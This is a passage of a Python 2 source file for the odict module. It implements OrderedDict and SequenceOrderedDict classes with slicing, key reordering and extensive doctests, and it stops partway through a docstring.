__author__ = ('Nicola Larosa <[email protected]>,'
'Michael Foord <fuzzyman AT voidspace DOT org DOT uk>')
__docformat__ = "restructuredtext en"
__revision__ = '$Id$'
__version__ = '0.2.2'
__all__ = ['OrderedDict', 'SequenceOrderedDict']
import sys
INTP_VER = sys.version_info[:2]
if INTP_VER < (2, 2):
raise RuntimeError("Python v.2.2 or later required")
import types, warnings
class OrderedDict(dict):
"""
A class of dictionary that keeps the insertion order of keys.
All appropriate methods return keys, items, or values in an ordered way.
All normal dictionary methods are available. Update and comparison is
restricted to other OrderedDict objects.
Various sequence methods are available, including the ability to explicitly
mutate the key ordering.
__contains__ tests:
>>> d = OrderedDict(((1, 3),))
>>> 1 in d
1
>>> 4 in d
0
__getitem__ tests:
>>> OrderedDict(((1, 3), (3, 2), (2, 1)))[2]
1
>>> OrderedDict(((1, 3), (3, 2), (2, 1)))[4]
Traceback (most recent call last):
KeyError: 4
__len__ tests:
>>> len(OrderedDict())
0
>>> len(OrderedDict(((1, 3), (3, 2), (2, 1))))
3
get tests:
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.get(1)
3
>>> d.get(4) is None
1
>>> d.get(4, 5)
5
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1)])
has_key tests:
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.has_key(1)
1
>>> d.has_key(4)
0
"""
def __init__(self, init_val=(), strict=False):
"""
Create a new ordered dictionary. Cannot init from a normal dict,
nor from kwargs, since items order is undefined in those cases.
If the ``strict`` keyword argument is ``True`` (``False`` is the
default) then when doing slice assignment - the ``OrderedDict`` you are
assigning from *must not* contain any keys in the remaining dict.
>>> OrderedDict()
OrderedDict([])
>>> OrderedDict({1: 1})
Traceback (most recent call last):
TypeError: undefined order, cannot get items from dict
>>> OrderedDict({1: 1}.items())
OrderedDict([(1, 1)])
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1)])
>>> OrderedDict(d)
OrderedDict([(1, 3), (3, 2), (2, 1)])
"""
self.strict = strict
dict.__init__(self)
if isinstance(init_val, OrderedDict):
self._sequence = init_val.keys()
dict.update(self, init_val)
elif isinstance(init_val, dict):
# we lose compatibility with other ordered dict types this way
raise TypeError('undefined order, cannot get items from dict')
else:
self._sequence = []
self.update(init_val)
### Special methods ###
def __delitem__(self, key):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> del d[3]
>>> d
OrderedDict([(1, 3), (2, 1)])
>>> del d[3]
Traceback (most recent call last):
KeyError: 3
>>> d[3] = 2
>>> d
OrderedDict([(1, 3), (2, 1), (3, 2)])
>>> del d[0:1]
>>> d
OrderedDict([(2, 1), (3, 2)])
"""
if isinstance(key, types.SliceType):
# FIXME: efficiency?
keys = self._sequence[key]
for entry in keys:
dict.__delitem__(self, entry)
del self._sequence[key]
else:
# do the dict.__delitem__ *first* as it raises
# the more appropriate error
dict.__delitem__(self, key)
self._sequence.remove(key)
def __eq__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d == OrderedDict(d)
True
>>> d == OrderedDict(((1, 3), (2, 1), (3, 2)))
False
>>> d == OrderedDict(((1, 0), (3, 2), (2, 1)))
False
>>> d == OrderedDict(((0, 3), (3, 2), (2, 1)))
False
>>> d == dict(d)
False
>>> d == False
False
"""
if isinstance(other, OrderedDict):
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() == other.items())
else:
return False
def __lt__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> c < d
True
>>> d < c
False
>>> d < dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() < other.items())
def __le__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> e = OrderedDict(d)
>>> c <= d
True
>>> d <= c
False
>>> d <= dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
>>> d <= e
True
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() <= other.items())
def __ne__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d != OrderedDict(d)
False
>>> d != OrderedDict(((1, 3), (2, 1), (3, 2)))
True
>>> d != OrderedDict(((1, 0), (3, 2), (2, 1)))
True
>>> d == OrderedDict(((0, 3), (3, 2), (2, 1)))
False
>>> d != dict(d)
True
>>> d != False
True
"""
if isinstance(other, OrderedDict):
# FIXME: efficiency?
# Generate both item lists for each compare
return not (self.items() == other.items())
else:
return True
def __gt__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> d > c
True
>>> c > d
False
>>> d > dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() > other.items())
def __ge__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> e = OrderedDict(d)
>>> c >= d
False
>>> d >= c
True
>>> d >= dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
>>> e >= d
True
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() >= other.items())
def __repr__(self):
"""
Used for __repr__ and __str__
>>> r1 = repr(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f'))))
>>> r1
"OrderedDict([('a', 'b'), ('c', 'd'), ('e', 'f')])"
>>> r2 = repr(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd'))))
>>> r2
"OrderedDict([('a', 'b'), ('e', 'f'), ('c', 'd')])"
>>> r1 == str(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f'))))
True
>>> r2 == str(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd'))))
True
"""
return '%s([%s])' % (self.__class__.__name__, ', '.join(
['(%r, %r)' % (key, self[key]) for key in self._sequence]))
def __setitem__(self, key, val):
"""
Allows slice assignment, so long as the slice is an OrderedDict
>>> d = OrderedDict()
>>> d['a'] = 'b'
>>> d['b'] = 'a'
>>> d[3] = 12
>>> d
OrderedDict([('a', 'b'), ('b', 'a'), (3, 12)])
>>> d[:] = OrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
OrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d[::2] = OrderedDict(((7, 8), (9, 10)))
>>> d
OrderedDict([(7, 8), (2, 3), (9, 10)])
>>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)))
>>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8)))
>>> d
OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)])
>>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)), strict=True)
>>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8)))
>>> d
OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)])
>>> a = OrderedDict(((0, 1), (1, 2), (2, 3)), strict=True)
>>> a[3] = 4
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)])
Traceback (most recent call last):
ValueError: slice assignment must be from unique keys
>>> a = OrderedDict(((0, 1), (1, 2), (2, 3)))
>>> a[3] = 4
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[::-1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(3, 4), (2, 3), (1, 2), (0, 1)])
>>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> d[:1] = 3
Traceback (most recent call last):
TypeError: slice assignment requires an OrderedDict
>>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> d[:1] = OrderedDict([(9, 8)])
>>> d
OrderedDict([(9, 8), (1, 2), (2, 3), (3, 4)])
"""
if isinstance(key, types.SliceType):
if not isinstance(val, OrderedDict):
# FIXME: allow a list of tuples?
raise TypeError('slice assignment requires an OrderedDict')
keys = self._sequence[key]
# NOTE: Could use ``range(*key.indices(len(self._sequence)))``
indexes = range(len(self._sequence))[key]
if key.step is None:
# NOTE: new slice may not be the same size as the one being
# overwritten !
# NOTE: What is the algorithm for an impossible slice?
# e.g. d[5:3]
pos = key.start or 0
del self[key]
newkeys = val.keys()
for k in newkeys:
if k in self:
if self.strict:
raise ValueError('slice assignment must be from '
'unique keys')
else:
# NOTE: This removes duplicate keys *first*
# so start position might have changed?
del self[k]
self._sequence = (self._sequence[:pos] + newkeys +
self._sequence[pos:])
dict.update(self, val)
else:
# extended slice - length of new slice must be the same
# as the one being replaced
if len(keys) != len(val):
raise ValueError('attempt to assign sequence of size %s '
'to extended slice of size %s' % (len(val), len(keys)))
# FIXME: efficiency?
del self[key]
item_list = zip(indexes, val.items())
# smallest indexes first - higher indexes not guaranteed to
# exist
item_list.sort()
for pos, (newkey, newval) in item_list:
if self.strict and newkey in self:
raise ValueError('slice assignment must be from unique'
' keys')
self.insert(pos, newkey, newval)
else:
if key not in self:
self._sequence.append(key)
dict.__setitem__(self, key, val)
def __getitem__(self, key):
"""
Allows slicing. Returns an OrderedDict if you slice.
>>> b = OrderedDict([(7, 0), (6, 1), (5, 2), (4, 3), (3, 4), (2, 5), (1, 6)])
>>> b[::-1]
OrderedDict([(1, 6), (2, 5), (3, 4), (4, 3), (5, 2), (6, 1), (7, 0)])
>>> b[2:5]
OrderedDict([(5, 2), (4, 3), (3, 4)])
>>> type(b[2:4])
<class '__main__.OrderedDict'>
"""
if isinstance(key, types.SliceType):
# FIXME: does this raise the error we want?
keys = self._sequence[key]
# FIXME: efficiency?
return OrderedDict([(entry, self[entry]) for entry in keys])
else:
return dict.__getitem__(self, key)
__str__ = __repr__
def __setattr__(self, name, value):
"""
Implemented so that accesses to ``sequence`` raise a warning and are
diverted to the new ``setkeys`` method.
"""
if name == 'sequence':
warnings.warn('Use of the sequence attribute is deprecated.'
' Use the keys method instead.', DeprecationWarning)
# NOTE: doesn't return anything
self.setkeys(value)
else:
# FIXME: do we want to allow arbitrary setting of attributes?
# Or do we want to manage it?
object.__setattr__(self, name, value)
def __getattr__(self, name):
"""
Implemented so that access to ``sequence`` raises a warning.
>>> d = OrderedDict()
>>> d.sequence
[]
"""
if name == 'sequence':
warnings.warn('Use of the sequence attribute is deprecated.'
' Use the keys method instead.', DeprecationWarning)
# NOTE: Still (currently) returns a direct reference. Need to
# because code that uses sequence will expect to be able to
# mutate it in place.
return self._sequence
else:
# raise the appropriate error
raise AttributeError("OrderedDict has no '%s' attribute" % name)
def __deepcopy__(self, memo):
"""
To allow deepcopy to work with OrderedDict.
>>> from copy import deepcopy
>>> a = OrderedDict([(1, 1), (2, 2), (3, 3)])
>>> a['test'] = {}
>>> b = deepcopy(a)
>>> b == a
True
>>> b is a
False
>>> a['test'] is b['test']
False
"""
from copy import deepcopy
return self.__class__(deepcopy(self.items(), memo), self.strict)
### Read-only methods ###
def copy(self):
"""
>>> OrderedDict(((1, 3), (3, 2), (2, 1))).copy()
OrderedDict([(1, 3), (3, 2), (2, 1)])
"""
return OrderedDict(self)
def items(self):
"""
``items`` returns a list of tuples representing all the
``(key, value)`` pairs in the dictionary.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.items()
[(1, 3), (3, 2), (2, 1)]
>>> d.clear()
>>> d.items()
[]
"""
return zip(self._sequence, self.values())
def keys(self):
"""
Return a list of keys in the ``OrderedDict``.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.keys()
[1, 3, 2]
"""
return self._sequence[:]
def values(self, values=None):
"""
Return a list of all the values in the OrderedDict.
Optionally you can pass in a list of values, which will replace the
current list. The value list must be the same len as the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.values()
[3, 2, 1]
"""
return [self[key] for key in self._sequence]
def iteritems(self):
"""
>>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iteritems()
>>> ii.next()
(1, 3)
>>> ii.next()
(3, 2)
>>> ii.next()
(2, 1)
>>> ii.next()
Traceback (most recent call last):
StopIteration
"""
def make_iter(self=self):
keys = self.iterkeys()
while True:
key = keys.next()
yield (key, self[key])
return make_iter()
def iterkeys(self):
"""
>>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iterkeys()
>>> ii.next()
1
>>> ii.next()
3
>>> ii.next()
2
>>> ii.next()
Traceback (most recent call last):
StopIteration
"""
return iter(self._sequence)
__iter__ = iterkeys
def itervalues(self):
"""
>>> iv = OrderedDict(((1, 3), (3, 2), (2, 1))).itervalues()
>>> iv.next()
3
>>> iv.next()
2
>>> iv.next()
1
>>> iv.next()
Traceback (most recent call last):
StopIteration
"""
def make_iter(self=self):
keys = self.iterkeys()
while True:
yield self[keys.next()]
return make_iter()
### Read-write methods ###
def clear(self):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.clear()
>>> d
OrderedDict([])
"""
dict.clear(self)
self._sequence = []
def pop(self, key, *args):
"""
No dict.pop in Python 2.2, gotta reimplement it
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.pop(3)
2
>>> d
OrderedDict([(1, 3), (2, 1)])
>>> d.pop(4)
Traceback (most recent call last):
KeyError: 4
>>> d.pop(4, 0)
0
>>> d.pop(4, 0, 1)
Traceback (most recent call last):
TypeError: pop expected at most 2 arguments, got 3
"""
if len(args) > 1:
            raise TypeError('pop expected at most 2 arguments, got %s' %
                            (len(args) + 1))
if key in self:
val = self[key]
del self[key]
else:
try:
val = args[0]
except IndexError:
raise KeyError(key)
return val
def popitem(self, i=-1):
"""
Delete and return an item specified by index, not a random one as in
dict. The index is -1 by default (the last item).
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.popitem()
(2, 1)
>>> d
OrderedDict([(1, 3), (3, 2)])
>>> d.popitem(0)
(1, 3)
>>> OrderedDict().popitem()
Traceback (most recent call last):
KeyError: 'popitem(): dictionary is empty'
>>> d.popitem(2)
Traceback (most recent call last):
IndexError: popitem(): index 2 not valid
"""
if not self._sequence:
raise KeyError('popitem(): dictionary is empty')
try:
key = self._sequence[i]
except IndexError:
raise IndexError('popitem(): index %s not valid' % i)
return (key, self.pop(key))
def setdefault(self, key, defval = None):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.setdefault(1)
3
>>> d.setdefault(4) is None
True
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1), (4, None)])
>>> d.setdefault(5, 0)
0
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1), (4, None), (5, 0)])
"""
if key in self:
return self[key]
else:
self[key] = defval
return defval
def update(self, from_od):
"""
Update from another OrderedDict or sequence of (key, value) pairs
>>> d = OrderedDict(((1, 0), (0, 1)))
>>> d.update(OrderedDict(((1, 3), (3, 2), (2, 1))))
>>> d
OrderedDict([(1, 3), (0, 1), (3, 2), (2, 1)])
>>> d.update({4: 4})
Traceback (most recent call last):
TypeError: undefined order, cannot get items from dict
>>> d.update((4, 4))
Traceback (most recent call last):
TypeError: cannot convert dictionary update sequence element "4" to a 2-item sequence
"""
if isinstance(from_od, OrderedDict):
for key, val in from_od.items():
self[key] = val
elif isinstance(from_od, dict):
# we lose compatibility with other ordered dict types this way
raise TypeError('undefined order, cannot get items from dict')
else:
# FIXME: efficiency?
# sequence of 2-item sequences, or error
for item in from_od:
try:
key, val = item
except TypeError:
raise TypeError('cannot convert dictionary update'
' sequence element "%s" to a 2-item sequence' % item)
self[key] = val
def rename(self, old_key, new_key):
"""
Rename the key for a given value, without modifying sequence order.
        If new_key already exists, this raises an exception, since it would be
        ambiguous what should happen to the associated values and to the
        position of new_key in the sequence.
>>> od = OrderedDict()
>>> od['a'] = 1
>>> od['b'] = 2
>>> od.items()
[('a', 1), ('b', 2)]
>>> od.rename('b', 'c')
>>> od.items()
[('a', 1), ('c', 2)]
>>> od.rename('c', 'a')
Traceback (most recent call last):
ValueError: New key already exists: 'a'
>>> od.rename('d', 'b')
Traceback (most recent call last):
KeyError: 'd'
"""
if new_key == old_key:
# no-op
return
if new_key in self:
raise ValueError("New key already exists: %r" % new_key)
# rename sequence entry
value = self[old_key]
old_idx = self._sequence.index(old_key)
self._sequence[old_idx] = new_key
# rename internal dict entry
dict.__delitem__(self, old_key)
dict.__setitem__(self, new_key, value)
def setitems(self, items):
"""
This method allows you to set the items in the dict.
It takes a list of tuples - of the same sort returned by the ``items``
method.
>>> d = OrderedDict()
>>> d.setitems(((3, 1), (2, 3), (1, 2)))
>>> d
OrderedDict([(3, 1), (2, 3), (1, 2)])
"""
self.clear()
# FIXME: this allows you to pass in an OrderedDict as well :-)
self.update(items)
def setkeys(self, keys):
"""
        ``setkeys`` allows you to pass in a new list of keys which will
replace the current set. This must contain the same set of keys, but
need not be in the same order.
If you pass in new keys that don't match, a ``KeyError`` will be
raised.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.keys()
[1, 3, 2]
>>> d.setkeys((1, 2, 3))
>>> d
OrderedDict([(1, 3), (2, 1), (3, 2)])
>>> d.setkeys(['a', 'b', 'c'])
Traceback (most recent call last):
KeyError: 'Keylist is not the same as current keylist.'
"""
# FIXME: Efficiency? (use set for Python 2.4 :-)
# NOTE: list(keys) rather than keys[:] because keys[:] returns
# a tuple, if keys is a tuple.
kcopy = list(keys)
kcopy.sort()
self._sequence.sort()
if kcopy != self._sequence:
raise KeyError('Keylist is not the same as current keylist.')
# NOTE: This makes the _sequence attribute a new object, instead
# of changing it in place.
# FIXME: efficiency?
self._sequence = list(keys)
def setvalues(self, values):
"""
You can pass in a list of values, which will replace the
current list. The value list must be the same len as the OrderedDict.
(Or a ``ValueError`` is raised.)
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.setvalues((1, 2, 3))
>>> d
OrderedDict([(1, 1), (3, 2), (2, 3)])
>>> d.setvalues([6])
Traceback (most recent call last):
ValueError: Value list is not the same length as the OrderedDict.
"""
if len(values) != len(self):
# FIXME: correct error to raise?
raise ValueError('Value list is not the same length as the '
'OrderedDict.')
self.update(zip(self, values))
### Sequence Methods ###
def index(self, key):
"""
Return the position of the specified key in the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.index(3)
1
>>> d.index(4)
Traceback (most recent call last):
ValueError: list.index(x): x not in list
"""
return self._sequence.index(key)
def insert(self, index, key, value):
"""
Takes ``index``, ``key``, and ``value`` as arguments.
Sets ``key`` to ``value``, so that ``key`` is at position ``index`` in
the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.insert(0, 4, 0)
>>> d
OrderedDict([(4, 0), (1, 3), (3, 2), (2, 1)])
>>> d.insert(0, 2, 1)
>>> d
OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2)])
>>> d.insert(8, 8, 1)
>>> d
OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2), (8, 1)])
"""
if key in self:
# FIXME: efficiency?
del self[key]
self._sequence.insert(index, key)
dict.__setitem__(self, key, value)
def reverse(self):
"""
Reverse the order of the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.reverse()
>>> d
OrderedDict([(2, 1), (3, 2), (1, 3)])
"""
self._sequence.reverse()
def sort(self, *args, **kwargs):
"""
Sort the key order in the OrderedDict.
This method takes the same arguments as the ``list.sort`` method on
your version of Python.
>>> d = OrderedDict(((4, 1), (2, 2), (3, 3), (1, 4)))
>>> d.sort()
>>> d
OrderedDict([(1, 4), (2, 2), (3, 3), (4, 1)])
"""
self._sequence.sort(*args, **kwargs)
class Keys(object):
# FIXME: should this object be a subclass of list?
"""
Custom object for accessing the keys of an OrderedDict.
Can be called like the normal ``OrderedDict.keys`` method, but also
supports indexing and sequence methods.
"""
def __init__(self, main):
self._main = main
def __call__(self):
"""Pretend to be the keys method."""
return self._main._keys()
def __getitem__(self, index):
"""Fetch the key at position i."""
# NOTE: this automatically supports slicing :-)
return self._main._sequence[index]
def __setitem__(self, index, name):
"""
You cannot assign to keys, but you can do slice assignment to re-order
them.
You can only do slice assignment if the new set of keys is a reordering
of the original set.
"""
if isinstance(index, types.SliceType):
# FIXME: efficiency?
# check length is the same
indexes = range(len(self._main._sequence))[index]
if len(indexes) != len(name):
raise ValueError('attempt to assign sequence of size %s '
'to slice of size %s' % (len(name), len(indexes)))
# check they are the same keys
# FIXME: Use set
old_keys = self._main._sequence[index]
new_keys = list(name)
old_keys.sort()
new_keys.sort()
if old_keys != new_keys:
raise KeyError('Keylist is not the same as current keylist.')
orig_vals = [self._main[k] for k in name]
del self._main[index]
vals = zip(indexes, name, orig_vals)
vals.sort()
for i, k, v in vals:
if self._main.strict and k in self._main:
raise ValueError('slice assignment must be from '
'unique keys')
self._main.insert(i, k, v)
else:
raise ValueError('Cannot assign to keys')
### following methods pinched from UserList and adapted ###
def __repr__(self): return repr(self._main._sequence)
# FIXME: do we need to check if we are comparing with another ``Keys``
# object? (like the __cast method of UserList)
def __lt__(self, other): return self._main._sequence < other
def __le__(self, other): return self._main._sequence <= other
def __eq__(self, other): return self._main._sequence == other
def __ne__(self, other): return self._main._sequence != other
def __gt__(self, other): return self._main._sequence > other
def __ge__(self, other): return self._main._sequence >= other
# FIXME: do we need __cmp__ as well as rich comparisons?
def __cmp__(self, other): return cmp(self._main._sequence, other)
def __contains__(self, item): return item in self._main._sequence
def __len__(self): return len(self._main._sequence)
def __iter__(self): return self._main.iterkeys()
def count(self, item): return self._main._sequence.count(item)
def index(self, item, *args): return self._main._sequence.index(item, *args)
def reverse(self): self._main._sequence.reverse()
def sort(self, *args, **kwds): self._main._sequence.sort(*args, **kwds)
def __mul__(self, n): return self._main._sequence*n
__rmul__ = __mul__
def __add__(self, other): return self._main._sequence + other
def __radd__(self, other): return other + self._main._sequence
## following methods not implemented for keys ##
def __delitem__(self, i): raise TypeError('Can\'t delete items from keys')
def __iadd__(self, other): raise TypeError('Can\'t add in place to keys')
def __imul__(self, n): raise TypeError('Can\'t multiply keys in place')
def append(self, item): raise TypeError('Can\'t append items to keys')
def insert(self, i, item): raise TypeError('Can\'t insert items into keys')
def pop(self, i=-1): raise TypeError('Can\'t pop items from keys')
def remove(self, item): raise TypeError('Can\'t remove items from keys')
def extend(self, other): raise TypeError('Can\'t extend keys')
class Items(object):
"""
Custom object for accessing the items of an OrderedDict.
Can be called like the normal ``OrderedDict.items`` method, but also
supports indexing and sequence methods.
"""
def __init__(self, main):
self._main = main
def __call__(self):
"""Pretend to be the items method."""
return self._main._items()
def __getitem__(self, index):
"""Fetch the item at position i."""
if isinstance(index, types.SliceType):
# fetching a slice returns an OrderedDict
return self._main[index].items()
key = self._main._sequence[index]
return (key, self._main[key])
def __setitem__(self, index, item):
"""Set item at position i to item."""
if isinstance(index, types.SliceType):
# NOTE: item must be an iterable (list of tuples)
self._main[index] = OrderedDict(item)
else:
# FIXME: Does this raise a sensible error?
orig = self._main.keys[index]
key, value = item
if self._main.strict and key in self and (key != orig):
raise ValueError('slice assignment must be from '
'unique keys')
# delete the current one
del self._main[self._main._sequence[index]]
self._main.insert(index, key, value)
def __delitem__(self, i):
"""Delete the item at position i."""
key = self._main._sequence[i]
if isinstance(i, types.SliceType):
for k in key:
# FIXME: efficiency?
del self._main[k]
else:
del self._main[key]
### following methods pinched from UserList and adapted ###
def __repr__(self): return repr(self._main.items())
# FIXME: do we need to check if we are comparing with another ``Items``
# object? (like the __cast method of UserList)
def __lt__(self, other): return self._main.items() < other
def __le__(self, other): return self._main.items() <= other
def __eq__(self, other): return self._main.items() == other
def __ne__(self, other): return self._main.items() != other
def __gt__(self, other): return self._main.items() > other
def __ge__(self, other): return self._main.items() >= other
def __cmp__(self, other): return cmp(self._main.items(), other)
def __contains__(self, item): return item in self._main.items()
def __len__(self): return len(self._main._sequence) # easier :-)
def __iter__(self): return self._main.iteritems()
def count(self, item): return self._main.items().count(item)
def index(self, item, *args): return self._main.items().index(item, *args)
def reverse(self): self._main.reverse()
def sort(self, *args, **kwds): self._main.sort(*args, **kwds)
def __mul__(self, n): return self._main.items()*n
__rmul__ = __mul__
def __add__(self, other): return self._main.items() + other
def __radd__(self, other): return other + self._main.items()
def append(self, item):
"""Add an item to the end."""
# FIXME: this is only append if the key isn't already present
key, value = item
self._main[key] = value
def insert(self, i, item):
key, value = item
self._main.insert(i, key, value)
def pop(self, i=-1):
key = self._main._sequence[i]
return (key, self._main.pop(key))
def remove(self, item):
key, value = item
try:
assert value == self._main[key]
except (KeyError, AssertionError):
raise ValueError('ValueError: list.remove(x): x not in list')
else:
del self._main[key]
def extend(self, other):
# FIXME: is only a true extend if none of the keys already present
for item in other:
key, value = item
self._main[key] = value
def __iadd__(self, other):
self.extend(other)
## following methods not implemented for items ##
def __imul__(self, n): raise TypeError('Can\'t multiply items in place')
class Values(object):
"""
Custom object for accessing the values of an OrderedDict.
Can be called like the normal ``OrderedDict.values`` method, but also
supports indexing and sequence methods.
"""
def __init__(self, main):
self._main = main
def __call__(self):
"""Pretend to be the values method."""
return self._main._values()
def __getitem__(self, index):
"""Fetch the value at position i."""
if isinstance(index, types.SliceType):
return [self._main[key] for key in self._main._sequence[index]]
else:
return self._main[self._main._sequence[index]]
def __setitem__(self, index, value):
"""
Set the value at position i to value.
You can only do slice assignment to values if you supply a sequence of
equal length to the slice you are replacing.
"""
if isinstance(index, types.SliceType):
keys = self._main._sequence[index]
if len(keys) != len(value):
raise ValueError('attempt to assign sequence of size %s '
                    'to slice of size %s' % (len(value), len(keys)))
# FIXME: efficiency? Would be better to calculate the indexes
# directly from the slice object
# NOTE: the new keys can collide with existing keys (or even
# contain duplicates) - these will overwrite
for key, val in zip(keys, value):
self._main[key] = val
else:
self._main[self._main._sequence[index]] = value
### following methods pinched from UserList and adapted ###
def __repr__(self): return repr(self._main.values())
# FIXME: do we need to check if we are comparing with another ``Values``
# object? (like the __cast method of UserList)
def __lt__(self, other): return self._main.values() < other
def __le__(self, other): return self._main.values() <= other
def __eq__(self, other): return self._main.values() == other
def __ne__(self, other): return self._main.values() != other
def __gt__(self, other): return self._main.values() > other
def __ge__(self, other): return self._main.values() >= other
def __cmp__(self, other): return cmp(self._main.values(), other)
def __contains__(self, item): return item in self._main.values()
def __len__(self): return len(self._main._sequence) # easier :-)
def __iter__(self): return self._main.itervalues()
def count(self, item): return self._main.values().count(item)
def index(self, item, *args): return self._main.values().index(item, *args)
def reverse(self):
"""Reverse the values"""
vals = self._main.values()
vals.reverse()
# FIXME: efficiency
self[:] = vals
def sort(self, *args, **kwds):
"""Sort the values."""
vals = self._main.values()
vals.sort(*args, **kwds)
self[:] = vals
def __mul__(self, n): return self._main.values()*n
__rmul__ = __mul__
def __add__(self, other): return self._main.values() + other
def __radd__(self, other): return other + self._main.values()
## following methods not implemented for values ##
def __delitem__(self, i): raise TypeError('Can\'t delete items from values')
def __iadd__(self, other): raise TypeError('Can\'t add in place to values')
def __imul__(self, n): raise TypeError('Can\'t multiply values in place')
def append(self, item): raise TypeError('Can\'t append items to values')
def insert(self, i, item): raise TypeError('Can\'t insert items into values')
def pop(self, i=-1): raise TypeError('Can\'t pop items from values')
def remove(self, item): raise TypeError('Can\'t remove items from values')
def extend(self, other): raise TypeError('Can\'t extend values')
class SequenceOrderedDict(OrderedDict):
"""
Experimental version of OrderedDict that has a custom object for ``keys``,
``values``, and ``items``.
These are callable sequence objects that work as methods, or can be
manipulated directly as sequences.
Test for ``keys``, ``items`` and ``values``.
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.keys
[1, 2, 3]
>>> d.keys()
[1, 2, 3]
>>> d.setkeys((3, 2, 1))
>>> d
SequenceOrderedDict([(3, 4), (2, 3), (1, 2)])
>>> d.setkeys((1, 2, 3))
>>> d.keys[0]
1
>>> d.keys[:]
[1, 2, 3]
>>> d.keys[-1]
3
>>> d.keys[-2]
2
>>> d.keys[0:2] = [2, 1]
>>> d
SequenceOrderedDict([(2, 3), (1, 2), (3, 4)])
>>> d.keys.reverse()
>>> d.keys
[3, 1, 2]
>>> d.keys = [1, 2, 3]
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.keys = [3, 1, 2]
>>> d
SequenceOrderedDict([(3, 4), (1, 2), (2, 3)])
>>> a = SequenceOrderedDict()
>>> b = SequenceOrderedDict()
>>> a.keys == b.keys
1
>>> a['a'] = 3
